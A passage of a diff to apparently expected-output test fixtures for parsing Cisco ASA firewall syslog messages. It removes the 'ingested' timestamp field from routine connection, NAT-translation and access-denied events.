 "code": "302016",
 "kind": "event",
@@ -13162,7 +13000,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.009224679Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:192.168.98.44/8295",
 "code": "305011",
 "kind": "event",
@@ -13241,7 +13078,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.009225651Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291)",
 "code": "302013",
 "kind": "event",
@@ -13325,7 +13161,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.009226843Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:192.168.254.94/53 (192.168.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
@@ -13410,7 +13245,6 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-12-29T09:58:07.009227829Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:192.168.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188",
 "code": "302016",
 "kind": "event",
@@ -13492,7 +13326,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.009228809Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:192.168.98.44/8296",
 "code": "305011",
 "kind": "event",
@@ -13571,7 +13404,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.009229789Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11826 for outside:192.168.54.190/80 (192.168.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292)",
 "code": "302013",
 "kind": "event",
@@ -13654,7 +13486,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.009230773Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297",
 "code": "305011",
 "kind": "event",
@@ -13733,7 +13564,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.009231774Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293)",
 "code": "302013",
 "kind": "event",
@@ -13816,7 +13646,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.009232815Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298",
 "code": "305011",
 "kind": "event",
@@ -13895,7 +13724,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.009233773Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294)",
 "code": "302013",
 "kind": "event",
@@ -13981,7 +13809,6 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-12-29T09:58:07.009234735Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:192.168.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs",
 "code": "302014",
 "kind": "event",
@@ -14063,7 +13890,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.009235696Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299",
 "code": "305011",
 "kind": "event",
@@ -14142,7 +13968,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.009236663Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295)",
 "code": "302013",
 "kind": "event",
@@ -14225,7 +14050,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.009237633Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300",
 "code": "305011",
 "kind": "event",
@@ -14304,7 +14128,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029403773Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296)",
 "code": "302013",
 "kind": "event",
@@ -14390,7 +14213,6 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-12-29T09:58:07.029414542Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:192.168.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs",
 "code": "302014",
 "kind": "event",
@@ -14475,7 +14297,6 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-12-29T09:58:07.029416169Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:192.168.98.165/80 to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs",
 "code": "302014",
 "kind": "event",
@@ -14560,7 +14381,6 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-12-29T09:58:07.029417189Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:192.168.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs",
 "code": "302014",
 "kind": "event",
@@ -14642,7 +14462,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029418175Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301",
 "code": "305011",
 "kind": "event",
@@ -14721,7 +14540,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029419153Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297)",
 "code": "302013",
 "kind": "event",
@@ -14804,7 +14622,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029420142Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302",
 "code": "305011",
 "kind": "event",
@@ -14883,7 +14700,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029421265Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298)",
 "code": "302013",
 "kind": "event",
@@ -14967,7 +14783,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029422301Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:192.168.179.9/53 (192.168.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
@@ -15052,7 +14867,6 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-12-29T09:58:07.029423268Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:192.168.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150",
 "code": "302016",
 "kind": "event",
@@ -15137,7 +14951,6 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-12-29T09:58:07.029424316Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:192.168.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs",
 "code": "302014",
 "kind": "event",
@@ -15219,7 +15032,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029425278Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303",
 "code": "305011",
 "kind": "event",
@@ -15298,7 +15110,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029426243Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:192.168.247.99/80 (192.168.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299)",
 "code": "302013",
 "kind": "event",
@@ -15381,7 +15192,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029427333Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304",
 "code": "305011",
 "kind": "event",
@@ -15460,7 +15270,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029428303Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300)",
 "code": "302013",
 "kind": "event",
@@ -15546,7 +15355,6 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-12-29T09:58:07.029429347Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:192.168.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs",
 "code": "302014",
 "kind": "event",
@@ -15631,7 +15439,6 @@
 "severity": 6,
 "duration": 0,
 "reason": "TCP FINs",
- "ingested": "2021-12-29T09:58:07.029430335Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:192.168.98.165/80 to inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs",
 "code": "302014",
 "kind": "event",
@@ -15713,7 +15520,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029431305Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305",
 "code": "305011",
 "kind": "event",
@@ -15792,7 +15598,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029432270Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301)",
 "code": "302013",
 "kind": "event",
@@ -15875,7 +15680,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029433374Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306",
 "code": "305011",
 "kind": "event",
@@ -15954,7 +15758,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029434415Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302)",
 "code": "302013",
 "kind": "event",
@@ -16006,7 +15809,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029435403Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280 duration 0:00:30",
 "code": "305012",
 "kind": "event",
@@ -16053,7 +15855,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029436373Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281 duration 0:00:30",
 "code": "305012",
 "kind": "event",
@@ -16100,7 +15901,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029437347Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282 duration 0:00:30",
 "code": "305012",
 "kind": "event",
@@ -16147,7 +15947,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029438412Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283 duration 0:00:30",
 "code": "305012",
 "kind": "event",
@@ -16194,7 +15993,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029439519Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284 duration 0:00:30",
 "code": "305012",
 "kind": "event",
@@ -16241,7 +16039,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029440787Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285 duration 0:00:30",
 "code": "305012",
 "kind": "event",
@@ -16288,7 +16085,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029441775Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286 duration 0:00:30",
 "code": "305012",
 "kind": "event",
@@ -16335,7 +16131,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029442754Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287 duration 0:00:30",
 "code": "305012",
 "kind": "event",
@@ -16382,7 +16177,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029443726Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288 duration 0:00:30",
 "code": "305012",
 "kind": "event",
@@ -16429,7 +16223,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029444784Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289 duration 0:00:30",
 "code": "305012",
 "kind": "event",
@@ -16476,7 +16269,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029445896Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290 duration 0:00:30",
 "code": "305012",
 "kind": "event",
@@ -16523,7 +16315,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029446902Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291 duration 0:00:30",
 "code": "305012",
 "kind": "event",
@@ -16570,7 +16361,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029447875Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292 duration 0:00:30",
 "code": "305012",
 "kind": "event",
@@ -16617,7 +16407,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029448910Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297 duration 0:00:30",
 "code": "305012",
 "kind": "event",
@@ -16664,7 +16453,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029449888Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298 duration 0:00:30",
 "code": "305012",
 "kind": "event",
@@ -16742,7 +16530,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029451128Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:192.168.98.44/8308",
 "code": "305011",
 "kind": "event",
@@ -16821,7 +16608,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029452256Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304)",
 "code": "302013",
 "kind": "event",
@@ -16873,7 +16659,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029453223Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:192.168.98.44/8299 duration 0:00:30",
 "code": "305012",
 "kind": "event",
@@ -16920,7 +16705,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029454200Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300 duration 0:00:30",
 "code": "305012",
 "kind": "event",
@@ -16999,7 +16783,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029455177Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:192.168.0.124/53 (192.168.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
@@ -17083,7 +16866,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029456265Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:192.168.160.2/53 (192.168.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
@@ -17168,7 +16950,6 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-12-29T09:58:07.029457444Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:192.168.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318",
 "code": "302016",
 "kind": "event",
@@ -17252,7 +17033,6 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-12-29T09:58:07.029458415Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:192.168.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104",
 "code": "302016",
 "kind": "event",
@@ -17334,7 +17114,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029459380Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:192.168.98.44/8309",
 "code": "305011",
 "kind": "event",
@@ -17413,7 +17192,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029460354Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305)",
 "code": "302013",
 "kind": "event",
@@ -17465,7 +17243,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029461720Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301 duration 0:00:30",
 "code": "305012",
 "kind": "event",
@@ -17512,7 +17289,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029462849Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302 duration 0:00:30",
 "code": "305012",
 "kind": "event",
@@ -17559,7 +17335,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029464208Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303 duration 0:00:30",
 "code": "305012",
 "kind": "event",
@@ -17606,7 +17381,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029465181Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304 duration 0:00:30",
 "code": "305012",
 "kind": "event",
@@ -17653,7 +17427,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029466194Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305 duration 0:00:30",
 "code": "305012",
 "kind": "event",
@@ -17700,7 +17473,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029467162Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306 duration 0:00:30",
 "code": "305012",
 "kind": "event",
@@ -17747,7 +17519,6 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-29T09:58:07.029468202Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:192.168.98.44/8307 duration 0:00:30",
 "code": "305012",
 "kind": "event",
@@ -17828,7 +17599,6 @@
 "severity": 6,
 "duration": 4000000000,
 "reason": "TCP Reset-I",
- "ingested": "2021-12-29T09:58:07.029469306Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:192.168.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I",
 "code": "302014",
 "kind": "event",
@@ -17910,7 +17680,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029470353Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -17991,7 +17760,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029471341Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18072,7 +17840,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029472317Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18153,7 +17920,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029473361Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:192.168.98.44/8310", "code": "305011", "kind": "event", @@ -18232,7 +17998,6 @@ }, "event": { "severity": 6, - "ingested": "2021-12-29T09:58:07.029474336Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306)", "code": "302013", "kind": "event", @@ -18315,7 +18080,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029475438Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -18396,7 +18160,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029476438Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18477,7 +18240,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029477422Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18558,7 +18320,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029478457Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18639,7 +18400,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029479443Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18720,7 +18480,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029480465Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18801,7 +18560,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029481548Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -18882,7 +18640,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029482592Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -18963,7 +18720,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029483558Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ -19044,7 +18800,6 @@ }, "event": { "severity": 4, - "ingested": "2021-12-29T09:58:07.029484542Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", @@ 